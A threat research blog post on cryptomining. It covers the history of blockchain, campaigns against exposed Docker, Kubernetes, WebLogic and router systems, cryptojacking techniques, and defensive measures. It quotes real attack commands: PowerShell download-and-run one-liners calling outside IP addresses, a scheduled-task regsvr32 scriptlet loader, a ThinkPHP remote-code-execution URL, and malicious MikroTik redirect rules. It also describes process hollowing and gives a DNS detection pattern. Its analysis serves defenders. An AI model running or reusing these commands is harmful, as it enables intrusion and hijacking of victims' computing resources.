Threat Research Report: The State of Cryptomining

RESEARCH & INTELLIGENCE / 02.12.20 / Bronson Boersma

Threat Research Report: The State of Cryptomining

Technology outpaces security; throughout the history of human invention we’ve traditionally leveraged technology before fully exploring its potential risks, and certainly long before developing appropriate security measures to safeguard users against potential attacks.

In this blog, we’ll discuss how cryptomining started, what targets are being mined, and exactly how threat actors are doing this. Our goal is to provide some context and instruction on how to protect your organization from cryptomining attacks.

History

During the 90s, research scientists Stuart Haber and W. Scott Stornetta developed a system called blockchain. This system was used to resolve weaknesses within time-stamping digital documents. The system was built on the concept of using a cryptographically secured chain of blocks to store the time-stamped documents. However, the system also relied on signatures being signed by a trustee, which left the solution vulnerable to integrity weakness.

In 2008 a pseudonymous person or group known as Satoshi Nakamoto conceptualized the idea behind blockchain. They improved the solution by implementing cryptographic signatures to timestamp digital documents, thus removing the risk of relying on trust.

In the following section we will look at the rise of cryptocurrency and explore how blockchain works.

The Financial Era of 2009

To understand the need for cryptocurrency, we need to look back at the global financial crisis of 2007 and early 2009. During this crisis, people lost their trust in banks. With a weakness in the trust model, people wanted an alternative system which provided transparency, authentication, and auditing.

On January 3rd 2009, the bitcoin network was released. This network was built to provide a decentralized payment network. The network uses a distributed ledger and cryptographic signatures, instead of relying on a centralized ledger built on a trust model.

In the following section we will outline the mechanics driven within blockchain.

Mechanics Within Blockchain

Blockchain operates on a flat peer-to-peer (P2P) network. Within this network transactions are broadcasted to all nodes:

Figure 1: Connected Peers

Electronic coins are used in these transactions; these coins contain digital signatures. Each owner transfers the coin to the next by digitally signing a hash of the previous transaction and the public key of the next owner. This record is then appended to the end of the coins. An illustration of this is available in Satoshi's paper (in the transaction section).

Nodes compete in a race to identify the correct hash belonging to the owner signature. Depending on how many nodes there are, they increase or decrease the time it takes for a node to identify a transaction block. The goal is to keep finding a new block once every ten minutes. Once a transaction block is identified, a verification process is initiated in which the rest of the nodes validate whether the node has correctly identified the transaction. If more than fifty percent of the nodes agree that the block was correctly identified, the block is then included in the ledger.

Now that we have a basic understanding of how this electronic payment system works, let’s review its volume.

The Flow of Traffic

To ensure cryptocurrency is issued at a steady pace, a process known as block halving is used. Block halving is a process of reducing the rate at which new cryptocurrency units are generated. Specifically, it refers to the periodical halving events that decrease the block rewards provided to miners.

Depending on the state of inflation, block halving normally occurs every four years. The image below illustrates the average number of transactions per block, since the beginning of blockchain’s history:

Figure 2: Average Transactions Per Block

As you can see, cryptomining has not stopped and traffic usually fluctuates yearly. The last bitcoin to be mined will be on May 7th, 2140.

Bitcoin is not the only type of cryptocurrency available. Below is a list of the top cryptocurrencies being mined and their proof-of-work hashing algorithms:

Litecoin uses the Scrypt algorithm for proof-of-work mining. It can be used by CPU, GPU, or Scrypt ASIC processing units. Scrypt ASIC is preferred.
Ravencoin uses the X16R algorithm for proof-of-work mining and supports GPU processors.
Grin uses the Cuckoo Cycle algorithm, which uses memory bandwidth rather than raw processor or GPU speed.
Horizen uses the Equihash algorithm for proof-of-work mining, which uses memory bandwidth rather than raw processor or GPU speed.
AEON uses the CryptoNight-Lite algorithm for proof-of-work mining, and can be used by CPU, and GPU.
Electroneum uses the CryptoNight algorithm for proof-of-work mining, and can be used by CPU, GPU or ASIC processing units. ASIC is preferred.
Feathercoin uses the NeoScrypt algorithm for proof-of-work mining, and supports GPU processing units.
Vertcoin uses the Lyra2REv2 algorithm for proof-of-work mining, and supports GPU processing units.
Monero uses the CryptoNight (and now Random-X algorithms) which supports CPU processing speeds.
Ethereum 1.0 uses the KECCAK-256 algorithm for proof-of-work mining, and supports CPU, and GPU processors. GPU is preferred.

By conceptualizing the different hash algorithms implemented, you can grasp the different systems that can be used to perform cryptomining operations.

In addition to considering what systems to target, processing power is also an important factor for cryptomining. In terms of making profit, threat actors tend to focus on how many systems could be used to mine cryptocurrency and what is needed to stay hidden in the systems for a long period of time. For example, the Nansh0u campaign was identified to have started back in February by targeting MySQL and phpMyAdmin services around the world. This operation resulted in more than 50,000 MS-SQL and PhpMyAdmin systems being used to mine TurtleCoins, another open-source cryptocurrency available to the public through using XMRig and JCE cryptominers. Turtlecoin uses 12 proof-of-work algorithms, which are CPU friendly:

CryptoNight
CryptoNight v1
CryptoNight v2
CryptoNight Lite v0
CryptoNight Lite v1
CryptoNight Lite v2
CryptoNight Turtle v0
CryptoNight Turtle v1
CryptoNight Turtle v2
CryptoNight Soft Shell v0
CryptoNight Soft Shell v1
CryptoNight Soft Shell v2

System Failure

Internet-facing services, websites, and repositories are highly sought-after targets for threat actors seeking to deploy cryptomining operations. This is because they are often visited by users and tend to run on high performance systems. The following are examples of attacks which have impacted AWS running Docker or Kubernetes, websites powered by Content Management Systems (CMSs), and systems running Oracle WebLogic.

Attack 1

Threat actors have slip-streamed malicious images carrying cryptominers known as graboids into the Docker Hub, the world's largest library and community for container images. This attack resulted in more than 2,000 cryptominers being spread across the Amazon cloud. Normally, Docker containers are not inspected by security products. When Docker containers are exposed on the Internet they quickly become a sought-after target.

The following images highlight a shodan.io search query on publicly exposed Dockers engines, which resulted in 15,914 instances:

Figure 3: 15,914 Exposed Docker Containers

Figure 4: Top Organization Exposing Docker Containers

Researchers from cyber threat intelligence firm Bad Packets recently identified an operation performing mass scans on Dockers that expose their API endpoints. These APIs allows threat actors to deploy commands used to perform cryptomining operations.

Attack 2

Threat actors identified and compromised hundreds of Internet-facing Kubernetes administration consoles operating a cluster of servers (without a password) hosted on Telsa public cloud. Threat actors used these systems to install mining pool software and configured systems to generate unlisted, semi-public endpoints to avoid detection. They also leveraged Cloudflare to hide the IP address of the mining pools. We have identified 10,520 exposed administrative consoles as of 2019:

Figure 5: 10,520 Exposed Kubernete Master Servers

Attack 3

Threat actors behind a campaign dubbed “Kitty campaign” attacked websites running Drupal by exploiting CVE-2018-7600, which allowed them to write a malicious PHP backdoor to distribute cryptominers hidden in a file called me0w.js. This campaign impacted over 400 government and university websites worldwide.

Attack 4

Vulnerabilities found in Oracle WebLogic, CVE-2017-10271 and CVE-2019-2725 were exploited by threat actors in 2018 and 2019 to deploy cryptominers. We have identified 17,010 systems which are currently running on the default port TCP 7001, as shown in the output below:

Figure 6: 17,010 Exposed Oracle WebLogic Administration Servers

Attack 5

The Android Debugging Bridge was used by threat actors to exploit Android-based Internet of Things (IoT) devices. These are appealing targets as they are rarely monitored, usually remain on, and are usually connected to the Internet. The attack starts by mapping the Android debugging bridge on port:5555. The following is an image taken from shodan.io illustrating 10,197 public facing android devices:

Figure 7: 10,197 Exposed Android Devices

Attack 6

Cryptomining attacks aren’t just random; often, high profile victims are targeted in order to hijack their access to larger-scale resources. A social engineering attack was recently identified as being used by a Singaporean national to steal the identity of millionaire and Riot Games Co-Founder Marc Merrill. Merrill’s compromised identity was used to lease Amazon Web Services and Google cloud computing power to mine various cryptocurrencies, including bitcoin and Ether. The prosecutors alleged that at some point the attacker even became the largest AWS data consumer, adding:

“In the few months his scheme remained active, [attacker’s name removed] consumed more than $5 million in unpaid cloud computing services with his mining operation and, for a brief period, was one of Amazon Web Services (AWS) largest consumers of data usage by volume.”

Thanks to data such as IP addresses and login information provided by Amazon, Google, Facebook and others, police were able to track down the chief suspect. The suspected attacker was apprehended and is currently being charged with eight counts of wire fraud, four counts of access device fraud, and two counts of aggravated identity theft.

In the following section we’ll look at examples of several tactics and tools used in the wild to deploy cryptominers.

Cryptojacking Techniques

Developers have, and are continuing to develop, programing libraries and interfaces used to mine for cryptocurrency, which is also known as cryptomining. These tools are also being used with techniques to hijack a computer to run a cryptominer. The term used to hijack a computer to run a cryptominer is called Cryptojacking.

While we dive into various tools, techniques, and resources, we’d like to emphasize this point: cryptominers used by threat actors should be seen as another component that can be added as a resource and when the time is right to start mining it can execute based on triggered events. Given the examples mentioned above (or others easily found online), cryptojacking should not be seen as a nuisance but as an active and real threat.

Cryptomining JavaScript Libraries

CryptoLoot offers a script called crypta.js, whose use is currently on the rise. CryptoLOOT provides an option to stay current with the latest obfuscation techniques to help avoid antivirus (AV) detection.

The following is an output displaying 4,387 systems leveraging this script:

Figure 8: 4,387 Systems Leveraging Crypto-Loot JS Script

Coinhive offered a script called Coinhive.min.js which allowed threat actors the ability to perform cryptomining operations. Coinhive has since been discontinued; however, there are still over 59,304 systems using it, as shown in the output below:

Figure 9: 59,304 Systems Leveraging Coinhive.min.js

Coinhive.min.js has widely been used in malvertising campaigns as this library makes it easy to embed code into highly trafficked websites.

Cryptomining Application Interfaces

JSEcoin provides webmasters code used to run cryptomining operations, which is also being picked up by threat actors. The following is an example of the code snippet that allows one to mine:

<script src="hxxps://load[.]jsecoin.com/load/2895/jsecoin[.]com/optionalSubID/0/" async defer></script>

It works by pointing to hxxps://load[.]jsecoin.com/load/2895/jsecoin[.]com/optionalSubID, which is an API used to interface with JSEcoin server:

Figure 10: JSEcoin Server v1.9.2

The number of miners leveraging JSEcoin is also increasing, as highlighted in the output below:

Figure 11: Total Number of Miners Mining for JSEcoin

Cryptomining Web Assembly Modules

WebAssembly WASM is a binary instruction format for a stack-based virtual machine (VM). It processes low-level bytecode which makes it fast, and is designed to be a portable target for compilation of high-level languages such as C, C++, Rust, and Golang. WASM is supported by many web browsers, such as Firefox, Chrome, WebKit/ Safari and Microsoft Edge. Cryptominers have been developed using this format, such as cryptonight[.]wasm and are being used by threat actors. For example, https://www.virustotal.com/graph/embed/gf83a4d7a8611461db53c74e01f444d5aa64cc5568d40454992b5dc0d23258d38

Public Platforms and Repositories

Public-facing resources such as YouTube and GitHub allow threat actors a way to bypass outbound firewall restrictions and avenues for spreading cryptominers.

For example, YouTube provides an advertising service which allows users to include iframe tags that allow threat actors to embed JavaScript libraries designed to perform cryptomining. Recently, a botnet known as Stantinko used YouTube ads to spread cryptominers, which infected more than 500,00 devices around the world.

Github carries a wealth of open-source cryptominers, which makes it easy for threat actors to modify and include code in their resources. For example, hxxps://github[.]com/fireice-uk/xmr-stak, which was adopted in the Stantinko botnet. In addition to the free code provided on GitHub, public repos can be used to secretly store backdoored cryptominers, such as monero.

Github is not the only public repository used to load cryptominers. In 2018, a campaign was launched targeting Kodi add-ons, which generated 62.57 Monero coins, equal to at least $7,000. Threat actors accomplished this by loading their cryptominers into XvBMC, Bubbles, and Gaia add-on repositories.

Cryptomining Browser Extensions

Threat actors deploying cryptominers have leveraged Chrome and Firefox add-on repos to store cryptominers disguised as innocent extensions, such as Image Previewer or Nigelify. A 2018 campaign deploying NigelThorn was identified to have leveraged browser extensions to infect more than 100,000 machines.

Traffic Redirection Techniques

A Coinhive campaign was recently launched targeting MikRoTik Routers in which over 200,000 MikroTik routers were compromised and used to mine Monero coins. Threat actors behind this campaign deployed scripts designed to create firewall rules like those shown below, which redirected users to a Coinhive landing page:

/ip proxy set enabled=yes
/ip proxy access add action=deny disabled=no
/ip firewall nat remove [find comment=sysadminpxy]
/ip firewall nat add disabled=no chain=dstnat protocol=tcp dst-port=80 src-address-list=!Ok action=redirect to-ports=8080 comment=sysadminpxy
/ip firewall nat move [find comment=sysadminpxy] destination=0
/ip firewall filter remove [find comment=sysadminpxy]
/ip firewall filter add disabled=no chain=input protocol=tcp dst-port=8080 action=add-src-to-address-list address-list=Ok address-list-timeout=15s comment=sysadminpxy
/ip dns set servers=8.8.8.8
/ip service set www disabled=yes port=80
/ip service set winbox disabled=no port=8291
/ip cloud set ddns-enabled=yes
/interface wireless security print file=sn112
/interface wireless print file=sn113

The number of compromised MikroTik routers has been reduced, as shown in the following shadon.io output:

Figure 12: 22,490 Exposed MikroTik Routers

Code Injection Techniques

iframe tags allow threat actors to inject links pointing to pages that carry cryptominers. For example, the following code can be easily embedded within a website:

This code would then redirect victims to a page containing the following script:

Sources specified in an iframe can also point to file transfer operations, for example:

PHP injections are commonly used to write PHP shells to execute system commands. Threat actors will enumerate a target for functions that fail to sanitize input found in PHP, for example:

hxxp://server/public/index[.]php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'.

This example demonstrates a vulnerability found in ThinkPHP v5.0.23 and v5.1.31. Threat actors have leveraged this vulnerability to inject SpeakUp payloads as a way to spread XMRig cryptominers.

Process Hollowers are commonly used in loaders to inject cryptominers into memory. They are usually disguised under native process names, such as svchost.exe. Process hollowing typically uses VirtualAllocEx (MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE) with WriteProcessMemory() rather than setting PAGE_EXECUTE_WRITECOPY, which is seen in normal loaded processes. Threat actors have also enhanced this technique by parsing ntdll.dll and by calling native system functions directly to avoid detection. For example, they can call GetModuleHandleA("ntdll.dll") to set a pointer to ntdll.dll; and then use GetProcAddress to locate the following native system calls, used to load the cryptominer into memory:

NtUnmapViewOfSection() – used to unmap the original cryptominer module.
NtCreateSection() -- used to create a section to write the cryptominer code.
NtMapViewOfSection() – used to map the above section to a native process, such as svchost.exe
NtWriteVirtualMemory() – used to write the ImageBaseAddress of the current process to the ImageBaseAddress of the hollowed process environment block.
NtResumeThread() – used to resume the suspended process and starts execution.

Command Execution Techniques

Researchers from cybersecurity firm Imperva identified that 90% of the attacks deploying cryptominers involved remote command execution. Remote command executions can be deployed in many ways, from pivoting on vulnerable system functions, such as PHP include(), java.lang.Runtime.getRuntime().exec to leveraging native binaries to perform remote code execution, such as:

cmd /c powershell -nop -noni -w hidden "$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains('DSM Event Log Filter')))) {IEX(New-Object Net.WebClient).DownloadString('hxxp://195.22.127.157:8000/info6.ps1')}

powershell.exe -Win hiddeN -Exec ByPasS add-content -path %APPDATA%cert.cer (New-Object Net.WebClient).DownloadString('hxxp://45.32.28.187:1012/cert.cer'); certutil -decode %APPDATA%cert.cer %APPDATA%update.ps1 & start /b cmd /c powershell.exe -Exec Bypass -NoExit -File %APPDATA%update.ps1 & start /b cmd /c del %APPDATA%cert.cer

These examples are used to execute cryptominers, or by leveraging XSL transformation, which can be used to execute system commands and embedded in different file formats such as ooxml or as a Windows Script Component. An example of this technique is shown below:

schtasks.exe /Create /SC MINUTE /TN example /TR "regsvr32 /s /n /u /i:http://example.com/dr/example.sct scrobj.dll" /MO 5 /F

Figure 13: XML Payload Example

Addition information on XSL can be found here. Living off the land provides an easy way to avoid threat detection, and many of these examples can be found over at https://lolbas-project.github.io/.

Evading security products is of utmost importance when performing cryptojacking attacks. In order for threat actors to make real profit they need to stay hidden within the system or network to mine for a period of months.

Some of these techniques used in the wild include:

Watchdog - Once a loader injects a cryptominer into a native process such as svchost.exe, a second module is loaded into memory and acts as a watchdog for the cryptominer. Its purpose is to terminate and spawn the cryptominer whenever it detects an event, such as when an antivirus agent or task manager is launched. Examples of these cryptominers include the WinstarNssmMiner or the Norman cryptominer.

Steganography - Threat actors are shifting to leveraging different file formats such as .wav and .png files to evade being detected. To further escape image recognition scanners, attackers have also leveraged compressions algorithms such as gzip to hide code from being detected. BlackBerry Cylance threat researchers previously detailed how cryptominers have leveraged wav files to avoid detection in this blog.

Fileless Attacks - Interpreters such as PowerShell, NSIS, AutoIT, and AutoHotKey provide threat actors the ability to avoid detection, as they can be used to directly execute payloads in memory. In addition, security solutions tend to leverage data pulled from samples compiled from commonly used compilers, such as msvc. As an example, the following PowerShell Scripts were used to craft and load GhostMiner:

NSIS allows developers to build plugins such as CallAnsiPlugin that can be used to call functions specified in a DLL. NSIS also includes plugin directories, which can store additional files. This allows threat actors a way of loading additional parameters from files which are not compiled into executable, as seen in the deployment of the Norman cryptominer.

AutoIT and AutoHotKey are free, open-source scripting languages for Microsoft Windows. Developed for the purpose of automating tasks, they can be used to interact with Windows Event Hooks, Inject VBScript/JScript, and DLLs into running processes. Threat actors tend to leverage shortcut links and scheduled tasks to invoke interpreters to execute parameters stored in a file. An example of this behavior can be seen in the polymorphic cryptominer known as RETADUP:

In addition to the techniques used to evade security mentioned above, we have noticed the following methods used to propagate through a compromised network:

File Management Services (SMB) and Remote Desktop Services (RDP) have been widely used to spread across systems by threats like MadoMiner and Zombieboy. Exploits such as EternalBlue, BlueKeep, and DejaBlue makes it even easier for threat actors to accomplish this. The following is a screenshot of 4,806,484 systems found exposing entry points for threat actors:

Figure 14: 4,806,484 Exposed Systems Services

Cryptojacking is not the only type of currency-generating attack known in the cryptoworld. There’s also what is known as ‘the 51% attack’, which has become mainstream and was even included in the sitcom Silicon Valley. The 51% attack refers to an attack on a Proof of Work blockchain where an operator leverages a group of miners to control more than 50% of the network's mining hash rate. When this happens, the operators would be able to reverse transactions or invalidate blocks of transactions.

Future Development in Cryptomining

In the tech world, we tend to adjust technology to fit our needs. One of those needs is the ability to maintain stability in the economy. People need to have faith in the economy, and trust that it will remain stable for long periods of time. Stablecoins are being developed to support this. Stablecoins are blockchain-based payments that aim to provide stability within cryptocurrency by leveraging fiat currency.

There are three types of fiat money: physical cash, central bank reserves, and commercial bank money. Currently, commercial bank money is the most likely to be used as collateral for stablecoins. Potential challenges exists within this solution, such as less regulation for big companies, and as cryptocurrency becomes more widely adopted it also becomes increasingly attractive to threat actors. Stablecoins, unfortunately, are still impacted by cryptojacking techniques.

Cryptomining has a huge effect on energy consumption. As a solution to this problem, Proof of Stake was developed. The issue arises when (PoW) miners compete in a race to solve a difficult puzzle. Proof of Stake is aimed at removing this processing power by applying a consensus algorithm which randomly chooses the winner based on the user's stake. The more coins owned by a miner, the more mining power they have, which in itself could cause issues in the foreseeable future.

Combating Threats in The Cyber World

So where do we go from here, and how do we protect ourselves from the dangers of the unknown? Our last section provides some ways to help protect your assets. Security should be treated as a lifestyle, and when we implement and practice proper security procedures, they become a habit.

Here are some procedures to for IT admins and teams to practice:

Isolate administrative privileges. Always ask yourself why a user should have administrative access to a system or network if accessing that system is not a core function of the person’s job or role. Giving people access to all systems because it’s easier to do than individually determining need in each use case is a surefire ticket to disaster. Lateral movement is commonly seen in cryptomining attacks; common shares used in lateral movements include windows admin shares, such as C$, ADMIN$, and IPC$.
Always keep systems patched. There’s no excuse for not keeping systems updated when patches are easily and (in most cases) freely available. The following are a few common vulnerabilities that have been exploited during cryptojacking attacks:
◦ CVE-2019-2725
◦ CVE-2018-7602
◦ CVE-2017-0143
◦  CVE-2017-0144
◦  CVE-2017-0145
◦  CVE-2017-0146
◦  CVE-2017-0148
◦  CVE-2017-3506
◦  CVE-2017-10271
◦  CVE-2017-12149
◦  CVE–2017–8464
◦  CVE-2017-0176
◦  CVE–2017–12635
◦  CVE–2017–12636

Monitor Scheduled Jobs. IT admins should monitor DNS queries by filtering for text strings related to cryptocurrency mining. For example: "Bitcoin|Crypto|Cryptonight|Pool|BTC|XMR|Monero|Minergate|CoinHive|Zcash". When monitoring, look closely for elevated CPU spikes. Be aware that sudden CPU spikes after visiting a website is abnormal, and maybe be a telltale sign that a cryptominer has infected a system.

If you’d like to learn more about blockchain, check out https://bitcoin.org/bitcoin.pdf.

About Bronson Boersma

Senior Threat Researcher at BlackBerry Cylance

Bronson Boersma is a Senior Threat Researcher at BlackBerry Cylance.

Back

Threat Research Report: The State of Cryptomining